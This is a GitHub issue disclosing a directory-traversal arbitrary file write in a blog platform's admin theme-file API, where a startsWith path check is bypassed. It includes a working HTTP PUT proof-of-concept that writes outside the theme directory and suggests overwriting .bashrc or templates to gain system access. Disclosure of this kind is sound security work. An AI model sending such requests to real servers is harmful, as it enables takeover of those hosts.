Skip to content

An Arbitrary file writing vulnerability in the backend #421

Closed
@any-how

Description

@any-how

I am sure I have checked


I want to apply

  • BUG feedback

An interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.

PUT /api/admin/themes/caicai_anatole/files/content HTTP/1.1
Host: xxxx:8090
Content-Length: 105
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://xxx:8090
Referer: http://xxxx:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"path":"/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned","content":"xxxxx\nxxxttt\nbb"}

image

Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system

Metadata

Metadata

Assignees

Labels

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions